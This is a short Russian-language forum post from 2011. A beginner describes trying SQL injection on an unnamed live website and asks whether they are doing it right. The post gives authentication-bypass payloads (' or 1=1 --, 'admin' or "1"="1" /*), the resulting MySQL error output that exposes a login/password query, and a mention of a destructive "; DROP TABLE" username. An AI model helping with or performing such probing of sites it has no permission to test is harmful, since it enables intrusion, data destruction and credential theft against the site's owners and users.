17.09.2011, 20:48
|
|
Новичок
Регистрация: 09.09.2011
Сообщений: 12
С нами:
7723766
Репутация:
1
|
|
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:
Код:
DB Error: syntax error
SELECT login, password FROM emps WHERE login = '' or 1=1 --'
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]
а если 'admin' or "1"="1" /* то:
Код:
DB Error: unknown error
SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*'
[nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed]
Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю?
P.S. не называю сайт, хочу сам расковырять, если возможно. |
|
|